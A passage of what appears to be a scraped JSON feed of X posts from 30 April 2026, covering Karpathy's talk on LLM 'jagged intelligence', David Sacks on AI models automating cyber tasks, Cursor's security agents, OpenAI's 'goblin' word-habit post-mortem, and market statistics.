prompt、上下文窗口、工具调用和外部环境来操纵 LLM 这个新的“信息处理解释器”。\n\n他以自己开发的 MenuGen 应用为例,指出许多传统 AI 应用可能被模型原生能力直接取代,整个 App 在新范式下甚至“本不该存在”。 \n\n他特别强调 LLM 的能力呈现“锯齿状智能”(jagged intelligence):\n\n在可验证、可通过强化学习(RL)优化的领域(如重构十万行代码、发现零日漏洞)表现极强,但在需要常识判断的任务上却可能犯下低级错误。\n\n例如建议“走路去 50 米外洗车”而忽略车必须被开过去。\n\nKarpathy 认为,这种能力分布并非模型自然进化,而是实验室数据决策和 RL 训练覆盖范围的结果。 \n\nKarpathy 区分了两个重要概念:Vibe Coding 显著抬高了所有人开发软件的下限,让更多人能快速做出产品;\n\n而未来的 Agentic Engineering(智能体工程)则需要在利用 Agent 加速开发的同时,严格守住专业软件的质量、安全、可维护性和责任上限。\n\n他认为,智能变得廉价之后,最宝贵的仍是人类的理解、品味、判断、系统设计和规格定义能力,并引用了一句深刻的话:\n\n“你可以外包思考,但不能外包理解”。 \n\n此外,Karpathy 还展望了“神经计算机”的未来设想:神经网络可能成为主进程,而传统 CPU 和代码则退居协处理器。\n\n同时强调基础设施需要转向“Agent-first”,让 Agent 能更轻松地读取文档、调用服务和完成部署。", + "url": "https://x.com/berryxia/status/2049991262934380898", + "published_at": "2026-04-30T23:16:18+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这一波GPT- Image-2 出圈的原因感觉更多的是将其结合游戏真实的UI设计融合且效果出奇好。\n\n省token简单的prompt就可以完成,开发3D游戏也可以快速打好草稿。", + "url": "https://x.com/berryxia/status/2049988686788558992", + "published_at": "2026-04-30T23:06:04+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "David Sacks 在 X 平台上发布了一条推文,对 AI Security Institute 刚刚发布的公告进行了回应。\n\nAI Security Institute 宣布 OpenAI 的 GPT-5.5 模型(cyber 版本)成功完成了他们设计的“多步网络攻击模拟”。\n\n也成为第二个能端到端完成整个攻击链的模型(第一个是 Anthropic 的 Mythos)。 \n\n在推文中,David Sacks 表示,是时候揭开 Mythos 的神秘面纱了。\n\n他强调,Mythos 并非什么魔法,也不是末日武器,它只是众多能够自动化网络安全任务的模型中的第一个,就像 AI 已经能自动编写代码一样。\n\n现在 OpenAI 的 GPT-5.5-cyber 也达到了同样的水平,而所有前沿模型(包括来自中国的模型)预计将在大约 6 个月内跟上这一步伐。 \n\nDavid Sacks 进一步指出,这些模型并不会创造新的漏洞,它们只是发现已有的漏洞。\n\n代码中的 bug 本来就存在,使用 AI 来发现并修补它们,反而会让系统变得更加坚固。\n\n他认为,从前 AI 时代的网络安全到后 AI 时代的网络安全,将经历一次大规模的升级周期。\n\n升级完成后,市场很可能会达到 AI 驱动的网络进攻与 AI 驱动的网络防御之间的新的平衡状态。 \n\n他特别提醒,必须确保网络防御方先获得这些强大模型的访问权限,而非让攻击方抢先一步。\n\n这个过程已经启动,但需要迅速推进,尤其考虑到中国模型即将跟上的现实。\n\n此外,与 Mythos 不同,GPT-5.5-cyber 似乎没有 token 限制,因此它可能是第一个防御方能够实际投入使用的网络安全模型。 \n\nDavid Sacks 的整体立场是:AI 在网络攻击能力上的提升是不可避免的,但并非那么可怕,反而会推动整个网络安全生态的全面升级,前提是防御方必须领先一步。\n\n他通过这条推文,既澄清了外界对 Mythos 的过度神化,也为 OpenAI 的 GPT-5.5-cyber 提供了实际支持```​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​。", + "url": "https://x.com/berryxia/status/2049987993193402677", + "published_at": "2026-04-30T23:03:19+00:00", + "source": "nitter", + "title_zh": "OpenAI GPT-5.5通过AI安全研究所多步网络攻击模拟测试,成为继Anthropic Mythos后第二个完整构建攻击链的模型。专家认为AI攻防能力提升将推动网络安全生态全面升级,强调防御方需优先部署技术以维持攻防平衡。" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream?\n\nI built that. One hour. One Claude Code session.\n\nGary catches bad stats and wrong dates. Rex pushes back on everything.\n\nOpen source repo in the thread.\nhttps://youtu.be/ZYHX2RBPRLk", + "url": "https://x.com/jason/status/2049987662526992390", + "published_at": "2026-04-30T23:02:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "𝕏 网页端更新Cashtags 功能,可以给每个股票提供实时图表。", + "url": "https://x.com/berryxia/status/2049986437194621357", + "published_at": "2026-04-30T22:57:08+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Stripe 重磅推出 Link CLI!\nAgent 终于能安全花钱了:单次凭证 + 同步人工审批,Claude 买礼物都不怕乱花!\n\n1. 一行命令让 Agent 创建一次性支付凭证\n2. 每次消费你都收到实时推送并用 FaceID 确认\n3. 彻底解决 Agent 支付信任问题,安全又方便\n4. Claude 已经实测:自己挑礼物上 Gumroad 下单,完美闭环\n\nAgent 时代支付基础设施来了,开发者直接告诉你的 Agent 去用!\n\n项目地址:\nhttps://github.com/stripe/link-cli", + "url": "https://x.com/berryxia/status/2049985476334100833", + "published_at": "2026-04-30T22:53:19+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.", + "url": "https://x.com/jason/status/2049980353155064279", + "published_at": "2026-04-30T22:32:57+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "What’s good Atlanta", + "url": "https://x.com/jason/status/2049979777864331542", + "published_at": "2026-04-30T22:30:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Hardwood in the ATL", + "url": "https://x.com/jason/status/2049976123891552679", + "published_at": "2026-04-30T22:16:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Real life! With Jose! @AlvaradoJose15", + "url": "https://x.com/jason/status/2049975924238569627", + "published_at": "2026-04-30T22:15:21+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Q1 Revenue Growth, YoY % Change...\nMeta $META: +33%\nGoogle $GOOGL: +22%\nMicrosoft $MSFT: +18%\nApple $AAPL: +17%\nAmazon $AMZN: +17%\nNetflix $NFLX: +16%\nTesla $TSLA: +16%\nS&P 500 $SPY: +10%", + "url": "https://x.com/charliebilello/status/2049969984432914819", + "published_at": "2026-04-30T21:51:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). \n\nFor UberX? \n\nSure, they would need to be convinced.\n\nin a world moving to autonomy, the opportunity for humans is to add security, tasks, waiting and valet-like services to the mix", + "url": "https://x.com/jason/status/2049965338368819443", + "published_at": "2026-04-30T21:33:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2049964597403140486", + "published_at": "2026-04-30T21:30:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Valid.", + "url": "https://x.com/pmarca/status/2049964195954020800", + "published_at": "2026-04-30T21:28:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "San Francisco politicians and their constituents enable this suffering. \n\nThey are the cause of it, because they can stop it instantly. \n\nToday, tomorrow and every one of the last 1,000 days this has happened. \n\nFentanyl is a super drug and we should have zero tolerance for the distribution of it. \n\n[ and we should reschedule and regulate the less harmful drugs ]", + "url": "https://x.com/jason/status/2049963757036536190", + "published_at": "2026-04-30T21:27:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Please stop.", + "url": "https://x.com/jason/status/2049962845849170234", + "published_at": "2026-04-30T21:23:23+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year ago), the highest margin in company history. $AAPL\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049960986468069507", + "published_at": "2026-04-30T21:16:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Cuando sucede un problema en un puesto automatizado por la IA... ¿Quién es el responsable?", + "url": "https://x.com/GaryMarcus/status/2049960351198839176", + "published_at": "2026-04-30T21:13:28+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Who is accountable? \n\nthe latest from @marketoonist", + "url": "https://x.com/GaryMarcus/status/2049956829019447683", + "published_at": "2026-04-30T20:59:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049956378660200794", + "published_at": "2026-04-30T20:57:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Amazon Revenue (Billions)\n2026 (est): 810\n2025: 717\n2024: 638\n2023: 575\n2022: 514\n2021: 470\n2020: 386\n2019: 281\n2018: 233\n2017: 178\n2016: 136\n2015: 107\n2014: 89\n2013: 74\n2012: 61\n2011: 48\n2010: 34\n2009: 25\n2008: 19\n2007: 15\n2006: 11\n\n24% annualized growth over the last 20 years", + "url": "https://x.com/charliebilello/status/2049953936212217973", + "published_at": "2026-04-30T20:47:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Dear @elonmusk,\n\nIf you still genuinely care about AI safety, you can’t let the Trump administration leave the AI industry almost entirely unregulated. \n\nYou just can’t.\n\n- Gary", + "url": "https://x.com/GaryMarcus/status/2049952842010751095", + "published_at": "2026-04-30T20:43:38+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Pregame!", + "url": "https://x.com/jason/status/2049952806451171669", + "published_at": "2026-04-30T20:43:29+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Multi-year contracts don't matter. \n\n\"Deferred churn is still churn, it just shows up later.\n\nLong contracts do not mean customers are loyal, they just delay the moment they leave.\n\nIf a better solution comes along, they will switch when the contract ends.\" @jasonlk\n\nDoes getting customers on multi-year contracts even matter anymore @Bouazizalex @matanSF @adamguild @michaelpwalrath", + "url": "https://x.com/HarryStebbings/status/2049951674891203065", + "published_at": "2026-04-30T20:39:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins increased to a record 13.4% from 12.0% a year ago. $AMZN", + "url": "https://x.com/charliebilello/status/2049950680236827140", + "published_at": "2026-04-30T20:35:03+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The everything app! Go @uber go!", + "url": "https://x.com/jason/status/2049950138735407393", + "published_at": "2026-04-30T20:32:53+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Enjoying giving bounties in the vibecoding era \n\nLooking for someone to build annotated dot com in this podcast contest \n\nWinner gets $5k \n\nGLHF!", + "url": "https://x.com/jason/status/2049949284267590094", + "published_at": "2026-04-30T20:29:30+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "big upgrade for codex today!\n\ntry it for non-coding computer work.", + "url": "https://x.com/sama/status/2049946120441520624", + "published_at": "2026-04-30T20:16:55+00:00", + "source": "nitter", + "title_zh": "Codex今日发布重大升级,新增非编程领域计算机任务处理功能,用户可体验其广泛适用性。" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "it does seem cool", + "url": "https://x.com/sama/status/2049944981750833659", + "published_at": "2026-04-30T20:12:24+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "somebody feels very rejected 🤷‍♂️", + "url": "https://x.com/GaryMarcus/status/2049941019077247438", + "published_at": "2026-04-30T19:56:39+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.", + "url": "https://x.com/sama/status/2049932746567598472", + "published_at": "2026-04-30T19:23:47+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: J-Cal is offering a $5K bounty to whoever can execute his idea for annotated .com! Think you have what it takes? 🧵\n\n@Jason", + "url": "https://x.com/jason/status/2049931426972180820", + "published_at": "2026-04-30T19:18:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: It's never been easier to do everyday work with Codex.\n\nChoose your role, connect the apps you use every day, and try suggested prompts.\n\nCodex helps with everything from research and planning to docs, slides, spreadsheets, and more.", + "url": "https://x.com/sama/status/2049928776147230886", + "published_at": "2026-04-30T19:08:00+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "published_at": "2026-04-30T18:58:07+00:00", + "source": "nitter", + "title_zh": "Cursor公司持续推进其代码安全审查功能的技术优化,通过整合用户现有资源提升系统审查效能。" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements.\n\nAdjust triggers, add your own instructions, give them custom tooling, and choose how outputs are shared.", + "url": "https://x.com/cursor_ai/status/2049926285518848093", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter", + "title_zh": "Cursor平台近日推出面向团队及企业用户的安全审查功能,通过两类全天候代理机制提升协作开发安全性:一类实时检测代码合并请求中的漏洞并自动反馈问题,另一类按计划扫描代码库并在Slack同步风险报告。" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "还得是投行的女高管,操控股价有水平的", + "url": "https://x.com/realNyarime/status/2049924132037693573", + "published_at": "2026-04-30T18:49:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。", + "url": "https://x.com/svwang1/status/2049922524839018604", + "published_at": "2026-04-30T18:43:10+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。\n\n李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。", + "url": "https://x.com/svwang1/status/2049920960724427165", + "published_at": "2026-04-30T18:36:57+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Co-sign.", + "url": "https://x.com/pmarca/status/2049920259432513702", + "published_at": "2026-04-30T18:34:10+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Co-sign.", + "url": "https://x.com/DavidSacks/status/2049920259432513702", + "published_at": "2026-04-30T18:34:10+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).", + "url": "https://x.com/charliebilello/status/2049920236002963504", + "published_at": "2026-04-30T18:34:04+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2049919569134047726", + "published_at": "2026-04-30T18:31:25+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX", + "url": "https://x.com/charliebilello/status/2049913908861792603", + "published_at": "2026-04-30T18:08:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻\n\nThe tides are changing, and other folks like @wendyweeww are speaking out in support.", + "url": "https://x.com/GaryMarcus/status/2049909103129251864", + "published_at": "2026-04-30T17:49:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Your honour, I think this should be allowed.", + "url": "https://x.com/eladgil/status/2049908719782334528", + "published_at": "2026-04-30T17:48:18+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there within approximately 6 months. \n\nIt’s important to recognize that these models do not create vulnerabilities; they discover them. The bugs are already in the code. Using AI to discover and patch them will actually harden these systems.\n\nThe leap from pre-AI cyber to post-AI cyber means that there will be a big upgrade cycle. After that, however, the market is likely to reach a new equilibrium between AI-powered cyber-offense and AI-powered cyber-defense. \n\nObviously it’s important that cyber defenders get access before cyber attackers. That process is already underway but needs to happen quickly (see point above about Chinese models). \n\nUnlike Mythos, GPT-5.5-cyber appears not to be token constrained so it may be the first cyber model that defenders actually get to use.", + "url": "https://x.com/pmarca/status/2049907993588769006", + "published_at": "2026-04-30T17:45:25+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there within approximately 6 months. \n\nIt’s important to recognize that these models do not create vulnerabilities; they discover them. The bugs are already in the code. Using AI to discover and patch them will actually harden these systems.\n\nThe leap from pre-AI cyber to post-AI cyber means that there will be a big upgrade cycle. After that, however, the market is likely to reach a new equilibrium between AI-powered cyber-offense and AI-powered cyber-defense. \n\nObviously it’s important that cyber defenders get access before cyber attackers. That process is already underway but needs to happen quickly (see point above about Chinese models). \n\nUnlike Mythos, GPT-5.5-cyber appears not to be token constrained so it may be the first cyber model that defenders actually get to use.", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "published_at": "2026-04-30T17:45:25+00:00", + "source": "nitter", + "title_zh": "中文新闻播报语气快讯:\n新兴AI模型Mythos及GPT-5.5-cyber等相关技术逐步应用于自动化网络安全任务,引发攻防能力提升。虽不能创造漏洞,但AI可加速漏洞发现与修复,短期内将触发网络安全技术升级周期,未来市场或趋于AI驱动的攻防力量平衡。" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "This is the the quote I've been citing a lot recently.", + "url": "https://x.com/karpathy/status/2049907410303865030", + "published_at": "2026-04-30T17:43:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What the public markets are getting wrong about the SaaS-pocalypse\n\n\"The public markets are directionally right, but missing the real shift.\n\nThe threat is not AI tools themselves, it is the agents deciding what tools to use.\n\nWinners will be the companies' agents choose to integrate with, not the ones humans prefer to use.\" @jasonlk\n\nLove to hear your thoughts on this @mcannonbrookes @zoink @levie @AnjneyMidha @dharmesh @rory_builds", + "url": "https://x.com/HarryStebbings/status/2049905369963745470", + "published_at": "2026-04-30T17:35:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "OpenAI’s lawyer plays dirty. Why I am not surprised?", + "url": "https://x.com/GaryMarcus/status/2049904811165008099", + "published_at": "2026-04-30T17:32:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "lisan say more mean things about us you're being too nice", + "url": "https://x.com/sama/status/2049903925311267311", + "published_at": "2026-04-30T17:29:15+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights:\n\nThe first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). Three examples of new horizons:\n\n1. menugen: an app that can be fully engulfed by LLMs, with no classical code needed: input an image, output an image and an LLM can natively do the thing.\n2. install .md skills instead of install .sh scripts. Why create a complex Software 1.0 bash script for e.g. installing a piece of software if you can write the installation out in words and say \"just show this to your LLM\". The LLM is an advanced interpreter of English and can intelligently target installation to your setup, debug everything inline, etc.\n3. LLM knowledge bases as an example of something that was *impossible* with classical code because it's computation over unstructured data (knowledge) from arbitrary sources and in arbitrary formats, including simply text articles etc.\n\nI pushed on these because in every new paradigm change, the obvious things are always in the realm of speeding up or somehow improving what existed, but here we have examples of functionality that either suddenly perhaps shouldn't even exist (1,2), or was fundamentally not possible before (3).\n\nThe second (ongoing) theme is trying to explain the pattern of jaggedness in LLMs. How it can be true that a single artifact will simultaneously 1) coherently refactor a 100,000-line code base *and* 2) tell you to walk to the car wash to wash your car. I previously wrote about the source of this as having to do with verifiability of a domain, here I expand on this as having to also do with economics because revenue/TAM dictates what the frontier labs choose to package into training data distributions during RL. You're either in the data distribution (on the rails of the RL circuits) and flying or you're off-roading in the jungle with a machete, in relative terms. Still not 100% satisfied with this, but it's an ongoing struggle to build an accurate model of LLM capabilities if you wish to practically take advantage of their power while avoiding their pitfalls, which brings me to...\n\nLast theme is the agent-native economy. The decomposition of products and services into sensors, actuators and logic (split up across all of 1.0/2.0/3.0 computing paradigms), how we can make information maximally legible to LLMs, some words on the quickly emerging agentic engineering and its skill set, related hiring practices, etc., possibly even hints/dreams of fully neural computing handling the vast majority of computation with some help from (classical) CPU coprocessors.", + "url": "https://x.com/karpathy/status/2049903821095354523", + "published_at": "2026-04-30T17:28:50+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Wild graph from @Evident_HQ:", + "url": "https://x.com/GaryMarcus/status/2049902385808744558", + "published_at": "2026-04-30T17:23:08+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Our agent harness makes models inside Cursor faster, smarter, and more token-efficient.\n\nHere's how we test improvements to the harness, monitor and repair degradations, and customize it for different models.\n\nhttp://cursor.com/blog/continually-improving-agent-harness", + "url": "https://x.com/cursor_ai/status/2049901436918436249", + "published_at": "2026-04-30T17:19:22+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Global Central Bank Update:\n-Brazil cut rates for the second month in a row, 25 bps move down to 14.50%.", + "url": "https://x.com/charliebilello/status/2049897830567862624", + "published_at": "2026-04-30T17:05:02+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos\n\n没差这么多呀😂", + "url": "https://x.com/lxfater/status/2049896961382203667", + "published_at": "2026-04-30T17:01:35+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下不止中国大陆,连香港到美的互联也要玩烂了!\nFCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质\n\n会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运营商的互联。如此一来,不仅电信、联通、移动、中信的美国电信业务被踢出局,还会连带IDC、IXP、PoP一同被赶这次行动会祭出「股权穿透」大招,即电信、联通、移动、中信的本体及其占股 >= 10% 的关联公司,都会因此连坐\n\n其中香港运营商PCCW和HKT都满足「股权穿透」条件,大概还有30-60天的公开征求意见期,以及可能的上诉法院司法审查。三大运营商+中信的游说团和律师团虽说要出动,但翻盘的成功率很低,因为但凡涉及national security这种包装话术,即使走到美国上诉法院,都免不了支持 FCC 提案,这毕竟符合美版《总体国家安全观》", + "url": "https://x.com/realNyarime/status/2049896651989614721", + "published_at": "2026-04-30T17:00:21+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题,\n\n从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。\n\nOpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。\n\n具体证据:\n1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 175%,gremlin 涨了 52%。\n\n2. Nerdy 人格只占所有回答的 2.5%,却贡献了 66.7% 的 goblin。76.2% 的数据集里,带怪物词的回答评分都比不带的高。\n\n3. RL 不保证学到的行为只待在原始条件里。Nerdy 下生成的样本被复用进 SFT(监督微调),整个模型就跟着学过去了。\n\n4. 还不止 goblin 一族——raccoon(浣熊)、troll、ogre、pigeon 全中招,frog 倒是大部分时候是合理使用。\n\n5. OpenAI 三月退役了 Nerdy 人格、删掉这条奖励、过滤了训练数据里的怪物词。GPT-5.5 没赶上修,就在 Codex 里加了一句\"别说 goblin\"的 system prompt 兜底。", + "url": "https://x.com/Pluvio9yte/status/2049890985631768653", + "published_at": "2026-04-30T16:37:50+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "would be very surprising if he didn’t. let’s see who can spot them first.", + "url": "https://x.com/GaryMarcus/status/2049890318200570310", + "published_at": "2026-04-30T16:35:11+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "N26关门了,中港澳台全部不接受", + "url": "https://x.com/realNyarime/status/2049889887684616218", + "published_at": "2026-04-30T16:33:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "👀回顾来时路\n\n从这条推文开始,进行了9个月的日更推文\n\n经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索\n\n算是找到了点出路\n\n离职的可以参考下,在职的也要掂量下", + "url": "https://x.com/GoSailGlobal/status/2049887802863583240", + "published_at": "2026-04-30T16:25:11+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out.\n\nI'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current skill level.\n\nIt covers skills that apply across ChatGPT, Gemini, Claude, and other AI tools. How to use deep research mode for well-researched reports on complex questions. How to give AI the right context, including more documents and images than most people realize you can provide. When to ask AI to think hard for several minutes on important decisions like what car to buy, what to study, or what job to take. And how to use AI to generate images, analyze data, and build simple games and websites.\n\nI also cover intuitions about how these models work under the hood, so you know when to trust an answer and when not to.\n\nAlong the way, you'll see flying squirrels, a creativity test, some of my old family photos, and fireworks.\n\nJoin me at http://deeplearning.ai/courses/ai-prompting-for-everyone", + "url": "https://x.com/AndrewYNg/status/2049886895530967534", + "published_at": "2026-04-30T16:21:35+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + 